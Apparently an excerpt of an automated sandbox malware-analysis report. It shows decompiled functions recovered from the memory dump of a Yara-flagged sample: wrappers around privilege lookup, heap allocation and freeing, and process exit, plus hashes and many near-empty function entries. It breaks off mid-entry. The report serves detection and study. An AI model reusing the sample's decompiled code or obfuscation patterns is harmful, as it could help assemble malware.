                                        • API String ID: 3899507212-0
                                        • Opcode ID: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction ID: 8f77f80b7463f2c8332381f0b5549404b1d42c3e6c11cc9d556c9b2ab4a61cc8
                                        • Opcode Fuzzy Hash: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction Fuzzy Hash: E7F055362102006BC710EBA8CC46CEBB7A9EFC8330B04C48AF95C87302C232EA5487D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 44%
                                        			E0041A1C1(void* __eax, void* __ecx, signed int __edx, void* __edi, intOrPtr _a4, WCHAR* _a8, signed char _a12, void* _a16) {
				signed char _t13;
				int _t15;
				WCHAR* _t20;

				asm("adc esp, esp");
				asm("arpl [edx-0x35], bx");
				 *(__edi - 0x74aafe3c) =  *(__edi - 0x74aafe3c) & __edx;
				E0041A960(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t13 = _a12;
				_t20 = _a8;
				asm("les edx, [edx+edx*2]");
				_t15 = LookupPrivilegeValueW(_t20, _t13 | 0x00000083, ??); // executed
				return _t15;
			}






                                        0x0041a1c1
                                        0x0041a1c5
                                        0x0041a1cc
                                        0x0041a1ea
                                        0x0041a1f2
                                        0x0041a1f5
                                        0x0041a1f9
                                        0x0041a200
                                        0x0041a204

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 260bc2e0297b61e89c3a52a7c47816c15a31ca062ff18f00a7caadebd9b9b745
                                        • Instruction ID: 217b86f539735e6d28fb20e59dba06c1d376326510f74e0bbb85afc5f7da938c
                                        • Opcode Fuzzy Hash: 260bc2e0297b61e89c3a52a7c47816c15a31ca062ff18f00a7caadebd9b9b745
                                        • Instruction Fuzzy Hash: 87F0A0B16102046FDB10DF64CC89EE77BA8EF45320F00856AF98897201D630A411CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				asm("in al, dx");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                        0x0041a072
                                        0x0041a073
                                        0x0041a07f
                                        0x0041a087
                                        0x0041a09d
                                        0x0041a0a1

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                        0x0041a047
                                        0x0041a05d
                                        0x0041a061

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, signed char _a12, void* _a16) {
				signed char _t9;
				int _t11;
				WCHAR* _t13;
				void* _t16;

				E0041A960(_t16, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t9 = _a12;
				_t13 = _a8;
				asm("les edx, [edx+edx*2]");
				_t11 = LookupPrivilegeValueW(_t13, _t9 | 0x00000083, ??); // executed
				return _t11;
			}







                                        0x0041a1ea
                                        0x0041a1f2
                                        0x0041a1f5
                                        0x0041a1f9
                                        0x0041a200
                                        0x0041a204

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A072, Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E0041A072() {
				char _t10;
				void* _t15;
				void* _t19;

				asm("in al, dx");
				_t7 =  *((intOrPtr*)(_t19 + 8));
				_t3 = _t7 + 0xc74; // 0xc74
				E0041A960(_t15,  *((intOrPtr*)(_t19 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t19 + 8)) + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap( *(_t19 + 0xc),  *(_t19 + 0x10),  *(_t19 + 0x14)); // executed
				return _t10;
			}






                                        0x0041a072
                                        0x0041a073
                                        0x0041a07f
                                        0x0041a087
                                        0x0041a09d
                                        0x0041a0a1

                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                        • Instruction ID: ddaf06fc0fbaf1b3adebf30d23e32afc4f43d02d9fcb1c6cda465e482f3eb4e3
                                        • Opcode Fuzzy Hash: 1003f38348de91aff8aad5e4e63cc2b9c0e10c34f63be8fed3bedb6f3b3b3e34
                                        • Instruction Fuzzy Hash: BAE046B1200204AFDB18DF69CC88EE73768EF88360F018659F90CAB241C631E910CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                        0x0041a0b3
                                        0x0041a0ca
                                        0x0041a0d8

                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                        Memory Dump Source
                                        • Source File: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: dcb8c95a3bf550d7884b7b70285db2f2367bc0f7efec8ca683e06c0a5bd79b15
                                        • Instruction ID: 479fa97fa1cf95204149968eb9de2ab3c64e97871f4b5f6b3dd88b3fb72dfd3f
                                        • Opcode Fuzzy Hash: dcb8c95a3bf550d7884b7b70285db2f2367bc0f7efec8ca683e06c0a5bd79b15
                                        • Instruction Fuzzy Hash: 0CB09B729014C5C6D711D7604608B277A40F7D0741F26C0B6D2030681A4778C491F5B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00407B02, Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: C$a$b$d$i
                                        • API String ID: 0-2334916691
                                        • Opcode ID: 7f910b7fd01d7d6b692b995daa2468f68b2049c7b0b6c094c4e888967b75a541
                                        • Instruction ID: dbc153a3c366992ac256709e05060a69be941f6317d89646d5f8f34cd47f59e6
                                        • Opcode Fuzzy Hash: 7f910b7fd01d7d6b692b995daa2468f68b2049c7b0b6c094c4e888967b75a541
                                        • Instruction Fuzzy Hash: C231A371A05308ABD714DFA1DC41BEFB778EF49304F00451EF519A7241DB7969418BE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB98A0, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fbe8a81490254254c695589868e0934e8218de0f8365fbbc8afe582e80c59338
                                        • Instruction ID: e79a88f9bb8a60aa33e0ecfb598640b8b8e0d4ca17b9b748266162d23b444c36
                                        • Opcode Fuzzy Hash: fbe8a81490254254c695589868e0934e8218de0f8365fbbc8afe582e80c59338
                                        • Instruction Fuzzy Hash: 1E90026630100402D30261594414B070049D7D1385F91C07AE1414595D86658963F172
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9820, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f76d122ce7be9f6dbf0cb6c8b9f65aebbf8fb75d76ad0e50ac607c8e609aa610
                                        • Instruction ID: 1abb8a3f640030fb22dff1af287bd4d885fcd2505d3ec9cca8b1c392e3e23743
                                        • Opcode Fuzzy Hash: f76d122ce7be9f6dbf0cb6c8b9f65aebbf8fb75d76ad0e50ac607c8e609aa610
                                        • Instruction Fuzzy Hash: CD90027624100402D34171594404B070049E7D0381F91C07AA0414594E86958A66FAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BBB040, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1155c9ccffcf9f6bd6c8aa55ed5f46fb1dadea5fe9df6cecf67ce094335c21d7
                                        • Instruction ID: 7f4cec9b39096567df81ef632361cc08baf9239a39b7f446b29e5390e618ddf3
                                        • Opcode Fuzzy Hash: 1155c9ccffcf9f6bd6c8aa55ed5f46fb1dadea5fe9df6cecf67ce094335c21d7
                                        • Instruction Fuzzy Hash: 6A9002A6601140434740B15948049075055E7E1341391C179A04445A0C86A88865E2A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB99D0, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4800bab32600242227463c11a4642579d462ad42feeee29d1e57986a7c63ec3
                                        • Instruction ID: 0a88a020fb441a778ce854d5034dac6311e11e44891435df434062e02c0fbfb7
                                        • Opcode Fuzzy Hash: c4800bab32600242227463c11a4642579d462ad42feeee29d1e57986a7c63ec3
                                        • Instruction Fuzzy Hash: 7E9002A621100042D30461594404B070085D7E1341F51C07AA2144594CC5698C71A165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9950, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 739fe6f86ba2acf54c8f58d8f79f9158c64a401f708ba92c578820ecd8f096c2
                                        • Instruction ID: 3077e85f2908bf6ea6915191f770bf66401143a2216be282fd623ec385c500a0
                                        • Opcode Fuzzy Hash: 739fe6f86ba2acf54c8f58d8f79f9158c64a401f708ba92c578820ecd8f096c2
                                        • Instruction Fuzzy Hash: 5D9002A620140403D34065594804B070045D7D0342F51C079A2054595E8A698C61B175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9A80, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcfbde854c686553d6c66d8a93b21763d9b827c356070b80d4a45ba47bd4773c
                                        • Instruction ID: b64abb2e699601d350cc0bfdb5add1cdf7154a95177020c7591d1db6c7421990
                                        • Opcode Fuzzy Hash: dcfbde854c686553d6c66d8a93b21763d9b827c356070b80d4a45ba47bd4773c
                                        • Instruction Fuzzy Hash: 5F90026620144442D34062594804F0F4145D7E1342F91C07DA4146594CC9558865A761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9A10, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd7935724888bfd2054403764cfbe47ed2abe0e20595e8261b41811dcbde0b0e
                                        • Instruction ID: a31203a41735970de68a4fba630e0b7ee28a66027c4bb02857b50663766ef183
                                        • Opcode Fuzzy Hash: dd7935724888bfd2054403764cfbe47ed2abe0e20595e8261b41811dcbde0b0e
                                        • Instruction Fuzzy Hash: FE90027620140402D30061594808B470045D7D0342F51C079A5154595E86A5C8A1B571
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BBA3B0, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 534e64132a5b3afff459a488d1fc3f3755335302b9e177de12a62fa964144476
                                        • Instruction ID: 651833b03914b5c53542579425df5f15fd749c4c7d43ffaf3c7bb5e0cbaa3e13
                                        • Opcode Fuzzy Hash: 534e64132a5b3afff459a488d1fc3f3755335302b9e177de12a62fa964144476
                                        • Instruction Fuzzy Hash: 0B90027620144002D34071598444B0B5045E7E0341F51C479E0415594C86558866E261
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9B00, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99eca672b0f1a3d78399833d2f4d6fb59c7a2f32db02424a6efcee03efcfb805
                                        • Instruction ID: 9d6bdb450fa2bf466091469efdc32f453ca5507849b9a3be5ad458e5036fe5d3
                                        • Opcode Fuzzy Hash: 99eca672b0f1a3d78399833d2f4d6fb59c7a2f32db02424a6efcee03efcfb805
                                        • Instruction Fuzzy Hash: E790026624100802D34071598414B070046D7D0741F51C079A0014594D86568975B6F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB95F0, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e971ae29bba25ac7ec8005acc4d29fda077dd2f54a94b5c38afd7603cc7faed4
                                        • Instruction ID: c38428692b4c8932a69b83c711c649dbb76eaa6779687f208e5aa72cc3133192
                                        • Opcode Fuzzy Hash: e971ae29bba25ac7ec8005acc4d29fda077dd2f54a94b5c38afd7603cc7faed4
                                        • Instruction Fuzzy Hash: E390027620100802D30461594804B870045D7D0341F51C079A6014695E96A588A1B171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BBAD30, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 177c34b8bf86a0e78d08908eae50ccb46a24927e0851e39b5c514783eed908bb
                                        • Instruction ID: a9d99f3fa41b712ef7fcbff13e593258bd616d2fcb54cba41e07325530310086
                                        • Opcode Fuzzy Hash: 177c34b8bf86a0e78d08908eae50ccb46a24927e0851e39b5c514783eed908bb
                                        • Instruction Fuzzy Hash: 33900276A0500012934071594814B474046E7E0781B55C079A0504594C89948A65A3E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9520, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e0c969a1f55c3ffbc05877529d8d1d4d6a3fa39a451fa6890797bc96791e0488
                                        • Instruction ID: f477e714e36d13f2f3da79b3548e223b48a5e2cbbd1bf9fe16ad2bfe2e84ae81
                                        • Opcode Fuzzy Hash: e0c969a1f55c3ffbc05877529d8d1d4d6a3fa39a451fa6890797bc96791e0488
                                        • Instruction Fuzzy Hash: 5D9002E6201140924700A2598404F0B4545D7E0341B51C07EE10445A0CC5658861E175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9560, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 586edecdc378cedf357ed40879afa023885f3ed0979f99fdd26602509a6ed215
                                        • Instruction ID: 33b5f2ce322f4f2c08897a7d455c20caf8d4596374250e937726e5239b8d4f7d
                                        • Opcode Fuzzy Hash: 586edecdc378cedf357ed40879afa023885f3ed0979f99fdd26602509a6ed215
                                        • Instruction Fuzzy Hash: BA90026A221000020345A5590604A0B0485E7D6391391C07DF14065D0CC6618875A361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB96D0, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e4683591605a80bbb8d27304f6117fe7bf883e3a9ecc2011f7e8cdd2cfbc25a
                                        • Instruction ID: 92c4028f59ee69c40a295a6a97ee660cf3186dc7e4fa1d33a912768982b4f1c2
                                        • Opcode Fuzzy Hash: 5e4683591605a80bbb8d27304f6117fe7bf883e3a9ecc2011f7e8cdd2cfbc25a
                                        • Instruction Fuzzy Hash: 0B90027620100842D30061594404F470045D7E0341F51C07EA0114694D8655C861B561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9610, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 680ee6a5d7d39420bf11d37bce279d17448295edb457cb8f4768494cfdc0e25a
                                        • Instruction ID: be25e5c4716303fd3021160bdf47f783a18c7e06ad6a801563c2612401f4f972
                                        • Opcode Fuzzy Hash: 680ee6a5d7d39420bf11d37bce279d17448295edb457cb8f4768494cfdc0e25a
                                        • Instruction Fuzzy Hash: 4D90027660500802D35071594414B470045D7D0341F51C079A0014694D87958A65B6E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9650, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5310e93e42c7f882dbd8764213c9eb181d31ddd1e21ad5ddb1444b8cbf66ee
                                        • Instruction ID: e97a43305439af14265971fb3c07bdca49c9d9e6a736d66e67a3e20a77fdde50
                                        • Opcode Fuzzy Hash: 4c5310e93e42c7f882dbd8764213c9eb181d31ddd1e21ad5ddb1444b8cbf66ee
                                        • Instruction Fuzzy Hash: 0690027620504842D34071594404F470055D7D0345F51C079A00546D4D96658D65F6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9FE0, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2473b77937ddf5f33d0cd403df53d6683f9fc86465189e124c3606500ba12423
                                        • Instruction ID: b7d0b2a0bd9819ee9da21c821f24c81b1d605ef44bfd26e96fed5f34496cc2da
                                        • Opcode Fuzzy Hash: 2473b77937ddf5f33d0cd403df53d6683f9fc86465189e124c3606500ba12423
                                        • Instruction Fuzzy Hash: C290027631114402D31061598404B070045D7D1341F51C479A0814598D86D588A1B162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9730, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21520a71333705543b09021f04145a2d10290953f66906fe2839ba2f7aef8ae7
                                        • Instruction ID: a61d2a53563824519627efc85ad4c0db1bb45f09cef1edecf93ae7dab6313802
                                        • Opcode Fuzzy Hash: 21520a71333705543b09021f04145a2d10290953f66906fe2839ba2f7aef8ae7
                                        • Instruction Fuzzy Hash: D590026660500402D34071595418B070055D7D0341F51D079A0014594DC6998A65B6E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BBA710, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2018db4d25046c0953abda36a81c894e59b97368f65d9fc54a52cae75fbad68
                                        • Instruction ID: 45d2fe921f523c23144de3ef4f41b879abd53680c618d0052577a312b2a198ee
                                        • Opcode Fuzzy Hash: b2018db4d25046c0953abda36a81c894e59b97368f65d9fc54a52cae75fbad68
                                        • Instruction Fuzzy Hash: 26900276301000529700A6995804F4B4145D7F0341B51D07DA4004594C85948871A161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9770, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 605e7563c92a6d711002c4c038901bc761106c1aa3a2af8a4ef5f0d7473cd921
                                        • Instruction ID: e9c822acb9256be3a40a5db63a9b5a358cdf9d5bdc2772d192825e7824239ccf
                                        • Opcode Fuzzy Hash: 605e7563c92a6d711002c4c038901bc761106c1aa3a2af8a4ef5f0d7473cd921
                                        • Instruction Fuzzy Hash: 7D90026620504442D30065595408F070045D7D0345F51D079A10545D5DC6758861F171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BBA770, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a4d19a47d3f00ff9e000d23a513118cfffd98901bd7e5cd91a81484db823309
                                        • Instruction ID: c363406fc4fdcd69ff15fdd872d77787ca0e21eece79776c489d52d139124f8e
                                        • Opcode Fuzzy Hash: 9a4d19a47d3f00ff9e000d23a513118cfffd98901bd7e5cd91a81484db823309
                                        • Instruction Fuzzy Hash: F190027A20504442D70065595804F870045D7D0345F51D479A04145DCD86948871F161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9760, Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 948d3ca7d9d8e59cea7e92569ca4233219ba18d3065474a3fa1ca69cb02ecb6c
                                        • Instruction ID: 80124537deb6d8650f16e5d295dc4697591f1e2912671dc881a1876248411879
                                        • Opcode Fuzzy Hash: 948d3ca7d9d8e59cea7e92569ca4233219ba18d3065474a3fa1ca69cb02ecb6c
